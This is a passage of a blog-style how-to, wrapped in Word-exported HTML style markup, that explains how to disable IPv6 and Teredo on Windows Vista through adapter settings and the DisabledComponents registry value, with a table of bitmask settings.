name="heading 1"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 2"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 3"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 4"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 5"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 6"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 7"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 8"&gt;   &lt;w:lsdexception locked="false" priority="9" qformat="true" name="heading 9"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 1"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 2"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 3"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 4"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 5"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 6"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 7"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 8"&gt;   &lt;w:lsdexception locked="false" priority="39" name="toc 9"&gt;   &lt;w:lsdexception locked="false" priority="35" qformat="true" name="caption"&gt;   &lt;w:lsdexception locked="false" priority="10" semihidden="false" unhidewhenused="false" qformat="true" name="Title"&gt;   &lt;w:lsdexception locked="false" priority="1" name="Default Paragraph Font"&gt;   &lt;w:lsdexception locked="false" priority="11" semihidden="false" unhidewhenused="false" qformat="true" name="Subtitle"&gt;   &lt;w:lsdexception locked="false" priority="22" semihidden="false" unhidewhenused="false" qformat="true" name="Strong"&gt;   &lt;w:lsdexception locked="false" priority="20" semihidden="false" unhidewhenused="false" qformat="true" name="Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="59" semihidden="false" unhidewhenused="false" name="Table Grid"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Placeholder Text"&gt;   &lt;w:lsdexception locked="false" priority="1" semihidden="false" unhidewhenused="false" qformat="true" name="No Spacing"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" unhidewhenused="false" name="Revision"&gt;   &lt;w:lsdexception locked="false" priority="34" semihidden="false" unhidewhenused="false" qformat="true" name="List Paragraph"&gt;   &lt;w:lsdexception locked="false" priority="29" semihidden="false" unhidewhenused="false" qformat="true" name="Quote"&gt;   &lt;w:lsdexception locked="false" priority="30" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Quote"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 1"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 2"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 3"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 4"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:roman; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1107304683 0 0 415 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-520092929 1073786111 9 0 415 0;} @font-face 	{font-family:"Trebuchet MS"; 	panose-1:2 11 6 3 2 2 2 2 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:647 0 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0cm; 	margin-right:0cm; 	margin-bottom:10.0pt; 	margin-left:0cm; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-fareast-font-family:Calibri; 	mso-bidi-font-family:"Times New Roman"; 	mso-fareast-language:EN-US;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	font-size:10.0pt; 	mso-ansi-font-size:10.0pt; 	mso-bidi-font-size:10.0pt; 	mso-ascii-font-family:Calibri; 	mso-fareast-font-family:Calibri; 	mso-hansi-font-family:Calibri;} @page Section1 	{size:595.3pt 841.9pt; 	margin:72.0pt 72.0pt 72.0pt 72.0pt; 	mso-header-margin:35.4pt; 	mso-footer-margin:35.4pt; 	mso-paper-source:0;} div.Section1 	{page:Section1;}  /* List Definitions */  @list l0 	{mso-list-id:187376061; 	mso-list-template-ids:406205136;} @list l0:level1 	{mso-level-tab-stop:36.0pt; 	mso-level-number-position:left; 	text-indent:-18.0pt;} @list l1 	{mso-list-id:2120054891; 	mso-list-template-ids:-447608746;} @list l1:level1 	{mso-level-tab-stop:36.0pt; 	mso-level-number-position:left; 	text-indent:-18.0pt;} ol 	{margin-bottom:0cm;} ul 	{margin-bottom:0cm;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Calibri","sans-serif"; 	mso-bidi-font-family:"Times New Roman";} &lt;/style&gt; &lt;![endif]--&gt;  &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Click OK when done.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;To re-enable IPv6, tick back      the check box.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;This method disables IPv6 on the particular LAN interface and connection. For other network adapter or connection, users have to repeat the steps to disable IPv6. Beside, disable IPv6 also does not disable IPv6 on tunnel interfaces or the IPv6 loopback interface.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;    &lt;p class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;It’s also possible to disable IPv6 and/or Teredo via Vista system registry. The registry settings also allow users to selectively disable components and configure behaviors for IPv6 in Windows Vista. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Open Registry editor (regedit).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Navigate to the following      registry key branch: &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 36pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Services\tcpip6\Parameters\&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ol start="3" type="1"&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Create the following      registry value (DWORD type): &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;p class="MsoNormal" style="margin-left: 36pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;DisabledComponents&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p class="MsoNormal" style="margin-left: 36pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Note that the name must be exactly as shown, including capitalization. DisabledComponents is set to 0 by default. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;ol start="4" type="1"&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;The DisabledComponents      registry value is a bit mask that controls the following series of flags,      starting with the low order bit (Bit 0). To determine the value of      DisabledComponents for a specific set of bits, the process is complicated,      were hexadecimal value is calculated from binary number of the bits in      correct position. For convenient, the following table lists some common      configuration combinations and the corresponding DWORD value of      DisabledComponents.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;table class="MsoNormalTable" style="margin-left: 36pt;" border="0" cellpadding="0"&gt;  &lt;thead&gt;   &lt;tr style=""&gt;    &lt;td style="padding: 0.75pt;" valign="top"&gt;    &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Configuration    combination&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;/td&gt;    &lt;td style="padding: 0.75pt;" valign="top"&gt;    &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;DisabledComponents    value&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;    &lt;/td&gt;   &lt;/tr&gt;  &lt;/thead&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Disable   all tunnel interfaces&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0×1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Disable   6to4&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0×2&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Disable   ISATAP&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0×4&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Disable   Teredo&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0×8&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Disable   Teredo and 6to4&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0xA&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Disable   all LAN and PPP interfaces&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0×10&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Disable   all LAN, PPP, and tunnel interfaces&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0×11&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Prefer   IPv4 over IPv6&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0×20&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr style=""&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Disable   IPv6 over all interfaces and prefer IPv4 to IPv6&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="padding: 0.75pt;" valign="top"&gt;   &lt;p class="MsoNormal" style="margin-bottom: 0.0001pt; line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;0xFF&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;  &lt;ol start="5" type="1"&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;As seen from table above, to      disable IPv6 support globally on all interface, set the value data for      DisabledComponents to &lt;b&gt;000000FF&lt;/b&gt;, or simply &lt;b&gt;FF&lt;/b&gt;. The registry      entry will look like below:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;&lt;br /&gt;  &lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters]&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;&lt;br /&gt;  &lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;"DisabledComponents"=dword:000000ff&lt;/span&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/li&gt;&lt;li class="MsoNormal" style="line-height: normal;"&gt;&lt;span style=";font-family:&amp;quot;;font-size:100%;"  &gt;Restart the computer for      changes to take 